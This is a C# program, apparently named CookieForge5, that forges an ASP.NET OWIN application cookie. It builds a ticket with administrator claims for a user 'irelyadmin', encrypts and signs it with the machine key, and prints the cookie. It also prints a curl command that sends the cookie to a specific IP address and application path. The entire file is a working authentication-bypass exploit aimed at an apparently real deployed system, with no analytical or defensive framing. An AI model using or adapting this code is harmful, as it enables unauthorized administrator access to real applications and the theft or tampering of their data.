// CookieForge5.cs — Use AspNetTicketSerializer + MachineKey.Protect // AspNetTicketSerializer serializes the ticket properly (OWIN format) // MachineKey.Protect encrypts+signs with machineKey using System; using System.Collections.Generic; using System.Security.Claims; using System.Web.Security; using Microsoft.Owin.Security.Interop; class Program { static void Main(string[] args) { var claims = new List { new Claim(System.Security.Claims.ClaimTypes.Name, "irelyadmin"), new Claim(System.Security.Claims.ClaimTypes.NameIdentifier, "1"), new Claim(System.Security.Claims.ClaimTypes.Role, "Administrator"), new Claim("http://schemas.microsoft.com/accesscontrolservice/2010/07/claims/identityprovider", "idsrv3test"), new Claim("Company", "01"), new Claim("UserId", "1"), new Claim("intRoleId", "1"), new Claim("intUserRoleID", "1"), }; var identity = new System.Security.Claims.ClaimsIdentity(claims, "ApplicationCookie", System.Security.Claims.ClaimTypes.Name, System.Security.Claims.ClaimTypes.Role); // AuthenticationProperties var props = new Microsoft.Owin.Security.AuthenticationProperties { IssuedUtc = DateTimeOffset.UtcNow, ExpiresUtc = DateTimeOffset.UtcNow.AddHours(1), }; props.Dictionary[".AspNet.Identity.UserId"] = "1"; props.Dictionary[".AspNet.Identity.UserName"] = "irelyadmin"; // AuthenticationTicket var ticket = new Microsoft.Owin.Security.AuthenticationTicket(identity, props); // Use AspNetTicketSerializer to serialize var serializer = new AspNetTicketSerializer(); byte[] serialized = serializer.Serialize(ticket); Console.WriteLine("Serialized ticket: " + serialized.Length + " bytes"); // Protect with MachineKey string[] purposes = new string[] { "Microsoft.AspNet.Identity.Application" }; byte[] protectedData = MachineKey.Protect(serialized, purposes); string cookieValue = Convert.ToBase64String(protectedData); Console.WriteLine("=== FORGED .AspNet.ApplicationCookie ==="); Console.WriteLine("Cookie length: " + cookieValue.Length + " chars"); Console.WriteLine(); Console.WriteLine("Cookie:"); Console.WriteLine(cookieValue); Console.WriteLine(); Console.WriteLine("=== TEST COMMAND ==="); Console.WriteLine("curl -sS -D - -b \".AspNet.ApplicationCookie=" + cookieValue + "\" http://50.21.183.111/2210CherryEnergyUAP1/"); } }